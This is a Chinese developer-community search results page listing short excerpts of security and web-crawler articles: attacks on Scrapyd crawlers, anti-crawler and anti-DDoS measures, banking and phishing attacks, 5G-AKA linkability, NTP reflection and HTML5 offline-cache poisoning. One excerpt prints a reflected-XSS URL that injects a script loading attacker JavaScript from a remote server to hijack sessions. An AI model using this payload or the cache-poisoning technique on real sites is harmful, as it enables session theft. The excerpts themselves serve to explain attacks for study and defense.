首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏离别歌 - 信息安全与代码审计

    攻击Scrapyd爬虫

    在1.5.2后,scrapy官方修复了这个问题,详见https://docs.scrapy.org/en/latest/news.html#scrapy-1-5-2-2019-01-22。 0x02 如何攻击scrapyd 一顿信息搜集后,目标整个工作流程就清晰了:用户输入的URL被交给部署在scrapyd上的爬虫进行爬取,爬虫调用了Chrome渲染页面,并将结果中的链接返回给用户。 0x03 利用CSRF漏洞攻击浏览器爬虫 针对6800端口的攻击在本地可以复现了,但是目标网站的6800是开启在内网的,我们无法直接访问。 可以借助目标前端的那个SSRF吗? 另外,在MVVM架构日益流行的当下,爬虫也变得更加灵活,特别是借助Chrome Headless或splash的爬虫能够动态执行JavaScript这个特性,能让爬虫爬到的信息更加完善,但也让攻击者有更多攻击途径 对于此类动态爬虫攻击者可以对浏览器或js引擎本身进行攻击,或者如我这样利用JavaScript攻击内网里一些基础服务。

    1.3K41发布于 2020-10-15
  • 来自专栏有趣的Python和你

    python爬虫之MQL5爬虫

    今天中文社区有人要爬MQL5的网站,要和其做的图表一样,这里写上原图和我画的图,代码就不上了~ 以下是我的图片 成长.png 结余.png 净值.png 表格没有做,回归的直线没有做,继续加油!

    47930发布于 2018-07-03
  • 来自专栏偶尔敲代码

    网站防御爬虫攻击的几种方式

    那网站一般用什么措施防范爬虫呢?主要有以下几种: 1、限制IP地址单位时间的访问次数 没有哪个常人一秒钟内能访问相同网站5次,除非是程序访问,而有这种喜好的,就剩下搜索引擎爬虫和讨厌的采集器了。 适用网站:所有网站 爬虫:对于版权文字,好办,替换掉。对于随机的垃圾文字,没办法,勤快点了。 5、用户登录才能访问网站内容 搜索引擎爬虫不会对每个这样类型的网站设计登录程序。 适用网站:极度讨厌搜索引擎,且想阻止大部分爬虫的网站 爬虫:制作拟用户登录提交表单行为的模块。 爬虫:伪装HTTP_REFERER,不难。 但是,这对搜索引擎爬虫没多大影响。

    1.3K50编辑于 2023-04-28
  • 来自专栏ZNing·腾创库

    爬虫和抗DDOS攻击技术实践

    导语 企鹅媒体平台媒体名片页反爬虫技术实践,分布式网页爬虫技术、利用人工智能进行人机识别、图像识别码、频率访问控制、利用无头浏览器PhantomJS、Selenium 进行网页抓取等相关技术不在本文讨论范围内 ,以便推广,那既然我们要做SEO优化为什么还要 “反爬虫” ? .eyJkYXRhIjpbXSwiZWkiOjUsInN0IjoiMTQ5MTg5OTczNjQ3NyIsImlhdCI6MTQ5MTg5OTc0M30.fTAsbJZNOTsHk0QoLfZIA-AXhO6ezaCOiCTj8lYCqO4 起到一定的防DDOS攻击的效果 通过上图我们可以看到,关键就是两次票据的签发与验证,一次由浏览器签发,一次由后台签发,但是验证真伪都是在服务端进行,这样做的最终效果就是,要对我们的界面进行抓取或攻击的人 ,必须按照我们设定的套路运转,就会增加他下载js并执行我们js的过程,如果有攻击方利用xss 获的肉机,对我们的域名发起攻击时,由于我们有两次票据验证,而去其中有一个票据的有效期时间很短,基本上不太可能对我们的服务器造成连续伤害了

    6.1K20发布于 2017-04-26
  • 来自专栏FreeBuf

    网络攻击瞄准个人银行,谈谈5个典型攻击手段

    虽然在过去几年针对银行的攻击手段变得更加复杂,但绝大多数攻击依旧依赖于用户欺骗。例如,针对银行的一种常见网络钓鱼攻击,就是将目标定向到恶意克隆的银行网站。 这一切都是为了引导用户犯错,而网络钓鱼还只是电子银行时代应该防范的攻击之一。以下介绍了黑客通过用户攻击银行的五种方式: SMS swaps攻击 短信诈骗在银行业已经非常普遍。 MITM攻击/中间人攻击 Man In-The-Middle(MITM)攻击由来已久,但非常有效,攻击者瞄准的是基础设施没有被充分保护的银行平台。 这种攻击通常用于攻击者所熟悉的组织,攻击者利用内部了解针对特定的负责付款的员工发起攻击。比如,他们可能会向会计发送一封电子邮件,表明是CFO要求他们支付一笔看似正常的款项。 以上这些攻击操作都依赖于最终的用户令牌,而银行如果MFA控件到位,攻击者将无法拿到这些令牌!

    1.4K20发布于 2019-08-20
  • 来自专栏Python数据科学

    Python爬虫架构5模板 | 你真的会写爬虫吗?

    为啥标题是这样,因为我们日常写小爬虫都是一个py文件加上几个请求,但是如果你去写一个正式的项目时,你必须考虑到很多种情况,所以我们需要把这些功能全部模块化,这样也使我们的爬虫更加的健全。 2、基础爬虫的架构以及运行流程 首先,给大家来讲讲基础爬虫的架构到底是啥样子的?JAP君给大家画了张粗糙的图: ? 从图上可以看到,整个基础爬虫架构分为5大类:爬虫调度器、URL管理器、HTML下载器、HTML解析器、数据存储器。 下面给大家依次来介绍一下这5个大类的功能: 1. 5.数据存储器:就是将HTML下载器发送过来的数据存储到本地。 4、总结 我们这里简单的讲解了一下,爬虫架构的五个模板,无论是大型爬虫项目还是小型的爬虫项目都离不开这五个模板,希望大家能够照着这些代码写一遍,这样有利于大家的理解,大家以后写爬虫项目也要按照这种架构去写

    2.3K41发布于 2019-05-10
  • 来自专栏Python爬虫逆向教程

    Python爬虫之文件存储#5

    爬虫专栏:http://t.csdnimg.cn/WfCSx 文件存储形式多种多样,比如可以保存成 TXT 纯文本形式,也可以保存为 JSON 格式、CSV 格式等,本节就来了解一下文本文件的存储方式。 运行结果如下: json.decoder.JSONDecodeError: Expecting property name enclosed in double quotes: line 3 column 5 10003', 'Jordan', 21]]) 输出效果是相同的,内容如下: id,name,age 10001,Mike,20 10002,Bob,22 10003,Jordan,21 但是一般情况下,爬虫爬取的都是结构化数据

    1.5K10编辑于 2024-02-10
  • 来自专栏AI科技大本营的专栏

    5行代码就能入门爬虫

    所以,我在写第一遍的时候,只用了5行代码,就成功抓取了全部所需的信息,当时的感觉就是很爽,觉得爬虫不过如此啊,自信心爆棚。 reportTime=2017-12-31&pageNum=%s' % (str(i)))[3] 5 tb.to_csv(r'1.csv', mode='a', encoding='utf_8_ sig', hea 3000+ 上市公司的信息,安安静静地躺在 Excel 中 ▌不断完善 有了上面的信心后,我开始继续完善代码,因为5行代码太单薄,功能也太简单,大致从以下几个方面进行了完善: 增加异常处理 经过以上这几点的完善,代码量从原先的5行增加到了下面的几十行: 1import requests 2import pandas as pd 3from bs4 import BeautifulSoup 4from lxml import etree 5import time 6import pymysql 7from sqlalchemy import create_engine 8from

    59220发布于 2019-03-06
  • 来自专栏安恒信息

    揭密HTML 5带来的攻击手法

    HTML5 是下一代的HTML,HTML5赋予网页更好的意义和结构。更加丰富的标签将随着对RDFa的,微数据与微格式等方面的支持,构建对程序、对用户都更有价值的数据驱动的Web。 基于HTML5开发的网页APP拥有更短的启动时间,更快的联网速度。本文详细介绍了HTML5的普及,带来的新的安全威胁。 利用跨站脚本攻击或浏览器地址栏注入javascript以后,Shell of the Future可进行劫持会话。 txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E 7、当用户点击之后,攻击者的IP地址将会发送给攻击5、该javascript代码会发送一个XMLHttpRequest请求。 6、分析返回的数据包,并把它发送到攻击者的服务器。 7、攻击者获取到公司内部站点的相关信息。

    1K50发布于 2018-04-09
  • 来自专栏ascii0x03的安全笔记

    HTML5离线缓存攻击测试

    攻击者由安装有XAMPP服务器的桥接虚拟机表示,IP为192.168.1.154。 攻击者可以访问本目录的demo_html.appcache获得缓存文件,在同名文件加入自己的恶意代码(这里是弹出hacked对话框),利用DNS欺骗、中间人等方式,这里将HOSTS文件更改为192.168.1.154 接下来,修改HOSTS文件为192.168.1.113 www.cache-test.com,模拟用户已经回到了安全的上网环境下,当用户再次访问该合法网站时,仍然出现的是上述攻击者的页面。 通过Wireshark抓包可以看到,浏览器仅仅请求了demo_html.appcache,离线缓存攻击成功。注意在实验时需要排除浏览器本身缓存的影响,仅仅刷新页面会收到服务器返回的304响应。 由于时间有限,并没有用爬虫去找使用了HTML5离线缓存的网站,仅仅做了这种攻击的验证实验,若有大家可以推荐几个来测试。 主页htm: <!

    2.1K90发布于 2018-04-12
  • 来自专栏重庆的技术分享区

    5种类型的员工经常受到网络钓鱼攻击攻击

    现代攻击者已经有组织的 从用户及其系统破坏,转向更容易的目标。网络钓鱼,比如黑客攻击活动,将伪装成合法流量的欺诈性电子邮件发送,是主要技术。 当这封邮件看起来是来自朋友或高层管理人员的时候,员工更自然地会信任它,并被钓鱼攻击吸引住。毕竟,谁会对老板说“不”? 相关:每个企业家都需要了解的7层网络安全层 这些攻击的总成本是数十亿美元。 他们的前线角色和特权关系鼓励攻击者将他们视为可以放弃王国钥匙的无障碍目标。对助理的攻击通常以另一位执行官的请求的形式出现,通常要求审查附件或发送财务信息。 5.任何员工 事实的真相是,大规模的网络钓鱼攻击和以往一样流行。在你的公司里,从首席执行官到入门级助理,任何人都可能成为网络钓鱼攻击的对象。 拥有响应可疑电子邮件的安全策略和公司范围的备份策略也可以降低攻击风险。 了解这些用户以及攻击者可能使用的诱饵使得安全意识和教育更具针对性,有趣和有效。

    1.1K20发布于 2018-08-01
  • 来自专栏FreeBuf

    5月11号网易被攻击谈起:新型DDoS攻击LFA

    5月11日晚上9时许,网易的大量用户发现访问网易新闻出现问题,相应的,有很多游戏用户报告说游戏掉线严重。一时间,有关“网易大楼着火”的谣传甚嚣。 图1 网易新闻客户端微博内容 这次攻击,相较于以往的DDoS攻击,官方描述比较特别:“骨干网络遭受攻击”。笔者敏锐地意识到这是最近学术界才提出的LFA攻击攻击范例比较少。 新型的DDoS攻击:Link Flooding Attack(链路洪泛攻击) LFA,可以认为是一种新型的DDoS攻击,全称Link Flooding Attack(链路洪泛攻击)。 根据LFA的一次攻击实例,笔者推测,攻击者可能攻击了网易机房的上层交换节点或其他类似机构(甚至可能是IXP,ISP之间的交换节点)。 总结起来,LFA的攻击具有如下特点: 1.低密度流量攻击,难以检测 2.攻击成本低 3.持续久,攻击者可以不停切换攻击link 短期内解决这个问题的关键是负载均衡、加大带宽、增加链路,深层次地看,我们应该重新考虑改进我们网络的基础架构了

    2.6K70发布于 2018-02-06
  • 来自专栏python全栈教程专栏

    爬虫学习(5):parse解析链接(网址)

    s.netloc) print(s[1]) print(s[3]) 这样打印结果姐如下: 4.urlunsplit() 跟上面那个方法类似,这个就是再把各个部分组合成完整的链接,长度必须是5, ,'spm=1011.2124.3001.5359',' '] print(urlunsplit(data)) 根据前面打印拆分结果,我再给它复原了,运行结果如下,又得到csdn首页链接了 5. wd=%E5%B7%9D%E5%B7%9D' print(unquote(url)) 它就可以把被编码后的中文还原。 这个模块差不多就这些了,学习爬虫慢慢来,不要一蹴而就。

    88220发布于 2021-10-18
  • 来自专栏Lan小站

    Week5 情话网小爬虫

    太久没写爬虫了,手生到连xpath怎么提取出来都忘记了,requests取回的数据编码都忘记怎么转换了 于是乎在百度上随便搜了一个情话网,来进行爬取。 ']/div[@class='bodyMain']/div[@class='bodyMainBody']/div[@class='infoList']/ul[@class='infoListUL mt5'

    50720编辑于 2022-07-13
  • 来自专栏绿盟科技研究通讯

    5G安全:5G-AKA链接攻击及对策

    然而,5G-AKA很容易受到来自主动攻击者的链接攻击,使用户的隐私处于危险之中。 5G-AKA协议在隐私保护方面易受链接攻击的缺陷,提出了一种基于密钥封装机制的5G-AKA改进方法来保护隐私,同时兼容现有5G标准,能够在不更换用户SIM卡、保持现有的5G服务网络部署的基础上抵御链接攻击 攻击者不仅可以跟踪高价值的目标用户,还可以获取到5G AKA会话中的SUPI,严重威胁到了5G系统的安全性。 目前在5G-AKA中已经发现了三种类型的链接攻击[2]。 如何使5G-AKA抵御链接攻击 本章主要根据5G-AKA协议遭受链接攻击的根本原因,提出了一些改进建议,使用户隐私在面对主动攻击者的链接攻击时可以得到更好的保护,在对5G-AKA协议修改做到最小的同时, 总结 本文首先介绍了5G-AKA的认证流程及其可能面临的链接攻击,然后分析了5G-AKA协议中链接攻击形成的根本原因,最后针对链接攻击介绍了5G-AKA协议的改进方法。

    2.6K30编辑于 2022-11-14
  • 来自专栏python3

    python 爬虫 5i5j房屋信息 获

    1 from lxml import etree 2 from selenium import webdriver 3 import pymysql 4 5 def Geturl(fullurl #链接url 10 zf_url_list = [] 11 for zf_url_lost in zf_list: 12 zf_url = 'https://bj.5i5j.com zp_info_need_2 27 connection = pymysql.connect(host='localhost', user='root', password='1234', db='5i5j try: 29 with connection.cursor() as cursor: 30 sql = "INSERT INTO `5i5j_info 39 for i in range(1,pags+1): 40 url = 'https://bj.5i5j.com/zufang/huilongguan/n{}/' 41

    48510发布于 2020-01-19
  • 来自专栏ascii0x03的安全笔记

    HTML5离线缓存攻击测试(二)

    经过昨天的测试,发现使用离线缓存的网站会被攻击。但是,不使用离线缓存的网站就真的不会受到这样的攻击么? (很郁闷相同的操作为啥有时候结果不一样,不过大部分还是造成了离线缓存攻击的效果。) 但是,百度也有https的版本,若访问https攻击实验就不会成功。 ? 既然百度可以,那么支付宝的页面呢? 不知道使用https进行离线缓存攻击会不会成功。 ? 除了百度和支付宝,还用网易的126.com做了实验。 个人认为,对于类似百度网站这样的服务器设置,会导致缓存攻击成功,感觉是浏览器实现时的一个bug。如果支付宝https能被离线缓存攻击,那么危害性还是很大的。

    2.3K60发布于 2018-04-12
  • 来自专栏程序员互动联盟

    史上最牛的5次黑客攻击

    它执行一个不起眼的加密技术被称为前缀碰撞攻击。另外它还可以将自己从被感染的计算机自动删除并毁灭它的所有痕迹。 火焰在头五年时间里伪装成Microsoft软件更新,直到后来偶然的一次机会才在伊朗被发现。 5、 只针对伊朗核电厂的Stuxnet病毒 正如我们前面提到的第一项,事实证明,除了虚拟世界的东西,黑客同样会可以毁灭现实中的物体。

    1.1K60发布于 2018-03-16
  • 来自专栏FreeBuf

    浅谈拒绝服务攻击的原理与防御(5) | NTP反射攻击复现

    0×01 故事起因 前两天以为freebuf上的网友stream(年龄、性别不详)私信我说他在阿里云上的服务器被NTP攻击了,流量超过10G,希望我帮忙一起分析一下,复现一下攻击。 我这当代雷锋当然非常乐意了,于是我就和stream联系(勾搭)上了,今天我就详细讲一下我们一起复现NTP反射攻击的过程。 bit加上,这块对咱们没用 第三四五个bit时表示版本的,现在常用第二版,所以这里是010 剩下三个bit是模式,0未定义、1表示主动对等体模式、2表示被动对等体模式、3表示客户模式、4表示服务器模式、5表示广播模式或组播模式 然后我修改了上次发的那个攻击脚本,把NTP的payload加了180个00,做了一下测试,攻击了一下stream的阿里云服务器 ? 看看攻击效果 ? 能打出2.2G的峰值,但是跟攻击者的10G 20G差很多,可能是我带宽的原因,当然也可能是攻击脚本不完美,日后还需要继续改进才行。

    4.1K50发布于 2018-02-23
  • 来自专栏python3

    Python爬虫笔记5-JSON格式数

    age':1000} print(json.dumps(data_list)) print(json.dumps(data_dict)) 运行结果: [1, 2, 3, 4] {"name": "\u5c0f

    1.4K10发布于 2020-01-03
领券